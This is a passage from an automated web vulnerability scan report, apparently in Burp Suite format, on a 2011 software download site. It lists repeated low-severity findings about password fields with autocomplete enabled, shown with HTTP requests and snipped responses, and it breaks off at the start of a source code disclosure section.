Path:   /downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54072


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.327. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-usenext-download-rizftkeg.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-usenext-download-rizftkeg.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56201


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.328. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54478


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.329. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54477


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.330. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-windows-live-mail-download-melibvyx.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:32 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52782


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.331. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.332. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.333. http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:19:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54487


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.334. http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66793


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.335. http://www.x64bitdownload.com/drivers/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /drivers/

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /drivers/ HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.336. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /drivers/64-bit-vista-drivers.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /drivers/64-bit-vista-drivers.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63574


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.337. http://www.x64bitdownload.com/featured-software.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /featured-software.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /featured-software.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:32:35 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 29094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.338. http://www.x64bitdownload.com/linktous.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /linktous.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /linktous.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.339. http://www.x64bitdownload.com/new-reviews.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /new-reviews.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /new-reviews.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:33:26 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 56251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.340. http://www.x64bitdownload.com/new-software.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /new-software.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /new-software.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:33:21 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 120254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.341. http://www.x64bitdownload.com/saved-software.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /saved-software.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /saved-software.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28771


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.342. http://www.x64bitdownload.com/saved-software.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /saved-software.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /saved-software.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28771


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</p>
                           <form action="login.html" method="post">
                           <table border="0" width="95%">
...[SNIP]...
<td><input type="password" name="password" size=30 class="input01">&nbsp;<input type="submit" name="submit" value="Login" >
...[SNIP]...

15.343. http://www.x64bitdownload.com/software-advanced.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /software-advanced.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /software-advanced.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.344. http://www.x64bitdownload.com/submit-pad-file.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /submit-pad-file.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /submit-pad-file.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.345. http://www.x64bitdownload.com/tellafriend.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /tellafriend.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /tellafriend.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.346. http://www.x64bitdownload.com/top-software-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /top-software-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /top-software-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 140029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

16. Source code disclosure
There are 7 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


16.1. http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://download.macromedia.com
Path:   /pub/shockwave/cabs/director/sw.cab

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /pub/shockwave/cabs/director/sw.cab HTTP/1.1
Host: download.macromedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 22 Oct 2010 12:14:09 GMT
ETag: "e6016-25803-94636640"
Accept-Ranges: bytes
Content-Length: 153603
Content-Type: text/plain
Expires: Mon, 24 Jan 2011 15:06:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 15:06:01 GMT
Connection: close

